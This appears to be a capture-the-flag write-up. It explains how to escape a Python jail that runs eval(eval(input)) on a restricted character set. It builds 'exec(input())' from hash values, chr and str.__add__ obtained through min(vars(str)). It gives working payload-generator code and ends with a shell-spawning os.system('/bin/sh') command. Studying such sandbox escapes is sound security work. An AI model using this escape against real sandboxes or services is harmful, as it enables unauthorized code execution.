
Trying some valid inputs results in prompts like:
>>> str
You try double eval'ing your contraption: <class 'str'>
Your contraption did not work.
This lets us know that the challenge is doing `eval(eval(input))`. So if we can craft some `input` that gives us shell, we can break out. If we can find a valid input that results in the string `"exec(input)" `, then we will have `eval(eval("exec(input)"))`, from which we can execute arbitrary python code without the character limitation. However, the character limitation means that there are very few things we can do to get `"exec(input())"`.

We can:
1) call functions, since we have access to ()
2) call built ins that are in the valid character set: `int(), getattr(), enumerate(), hasattr(), setattr(), ascii(), iter(), min(), set(), sum(), chr(), vars(), range(), str(), isinstance(), hash()`
3) create tuples

Notably we can't use e.g. `lambda` or `for`. We also dont have `'` or `"` so we can't convert any of the letters we have into strings like `"get"`

Trying various combinations of the builtins, we find that we can get numbers from `int` and `hash`:
>>> int()
>>> 0
>>> hash(str)
>>> 532164

Python `hash` is not a cryptographic hash. Rather it returns the Python internal hash value. This effectively (for this chall) is large random numbers.

We also have `chr` which allows us to convert from unicode codepoint number e.g. `40` to the character `A`. This suggests a potential approach: we can get new letters that we didn't previously have access to by getting the unicode number, and then using `chr`. `hash` called on random objects, e.g. `str`, `()`, `(str, int)` gives us an endless supply of large numbers. We also have access to `//` so we can floor divide to get smaller numbers. This hit-or-miss approach gets quite close, but would require an intensive brute force to try and find hashes that can be floor divided to get exactly what we want. If only we had access to some arithmetic ...

Okay, so assuming we are able to get the numbers we need, we now have a new issue: we cannot construct the final string. if we had the right numbers we may be able to construct e.g.
>>> (chr(101), chr(120), chr(101), (chr(99))
('e', 'x', 'e', 'c')

But this is not equal to `"exec"` which is what we need.

This is the trickiest part of the chall: solving both these problems comes from a useful coincidence, that is quite hard to discover.

A builtin we have is `vars`. `vars` will return the `__dict__` attribute for the object we apply it to, which includes all of its callables.
>>> set(vars(str))
{'__le__', '__contains__', 'casefold', 'center', 'count', 'find', 'rfind', 'rstrip', 'istitle', 'isprintable', '__ge__', '__rmod__', 'rjust', '__mod__', '__eq__', 'startswith', '__sizeof__', '__mul__', 'ljust', 'rpartition', '__getattribute__', 'format', 'isnumeric', 'swapcase', '__getnewargs__', 'zfill', '__doc__', 'isalnum', '__add__', 'rindex', 'isdecimal', '__len__', 'isalpha', 'replace', 'partition', 'expandtabs', 'isspace', 'title', '__new__', 'islower', 'isdigit', 'join', 'strip', '__format__', 'lstrip', 'upper', 'isupper', 'lower', '__getitem__', '__gt__', 'format_map', '__repr__', 'rsplit', 'split', 'index', 'endswith', '__hash__', 'maketrans', 'isidentifier', 'splitlines', '__str__', '__ne__', '__lt__', 'translate', '__rmul__', '__iter__', 'capitalize', 'encode'}
>>> set(vars(int))
{'__le__', '__pos__', '__ror__', '__sub__', '__ge__', '__rmod__', '__rfloordiv__', '__mod__', '__neg__', '__eq__', '__xor__', '__ceil__', '__rdivmod__', '__sizeof__', '__rsub__', '__rshift__', '__mul__', 'real', 'imag', '__getattribute__', '__pow__', '__getnewargs__', '__divmod__', '__int__', '__float__', '__index__', '__doc__', 'conjugate', '__rxor__', '__floor__', '__radd__', '__add__', '__rrshift__', 'denominator', '__or__', '__truediv__', '__new__', '__trunc__', '__format__', '__rpow__', '__rand__', '__bool__', '__invert__', '__round__', '__lshift__', '__rlshift__', '__gt__', '__and__', '__rtruediv__', '__repr__', 'to_bytes', '__hash__', 'from_bytes', 'numerator', '__str__', '__ne__', '__lt__', '__rmul__', '__abs__', '__floordiv__', 'bit_length'}

If we had any of these strings, we could use `getattr(object, attribute)` to call a method on an object. This might help with getting arithmetic on math, since Python `int` has `__add__`, `__sub__`. But how do we get elements out of the dictionary (returned by `vars`) or the set (returned by `set(vars)`)? We can `iter` over them, but without `next` (no `x` available), we can't access the elements still. There is only one useful built-in: `min`. `min` returns the smallest object in set, or smallest key in dict, based on _lexicographical_ ordering. Luckily, the smallest thing by lexicographical ordering is exactly what we want!


Now if we had `a` and `b` we can do `getattr('a', min(vars(str)))('b')` which returns `ab`. We can also do `getattr(1, min(vars(str)))(2)` which returns `3`.

The exploit program is below.

First, provide function `n(x)` to represent arbitrary numbers using the addition trick above and `hash`. Some "magic" numbers must be found from `hash` that are close to the desired codepoints, otherwise we have recursion depth exceeded on the chall server.
one = "hash(())//hash(())"

def add(x, y):
return "getattr({},min(vars(str)))({})".format(x, y)

def n(x):
if x == 80:
return "hash((str,str))//hash(str)//hash(((),))"
if x == 39:
return "hash((str,()))//hash(((),()))"
elif x == 6:
return "hash(())//hash(str)"
elif x == 1:
return one
elif x > 80:
return add(n(80), n(x - 80))
elif x > 39:
return add(n(39), n(x - 39))
elif x > 6:
return add(n(6), n(x - 6))
return add(one, n(x-1))

Then we get the unicode representation of the shellcode we want, and convert from unicode into chars, and join again with addition trick from above.
def char(x):
return "chr({})".format(n(ord(x)))

def shell():
des = "exec(input())"
return (char(x) for x in des)

def joined_shell():
init = "str()"
for x in shell():
init = add(init, x)
return init


Running this on the chall server provides `input()` that we can type anything into. E.g. `import os; os.system("/bin/sh")`. Since this is `input()`, we are not bound by the restrictions of the jail. This is then run by `exec`, and we have shell access, the chall flag is in the root dir.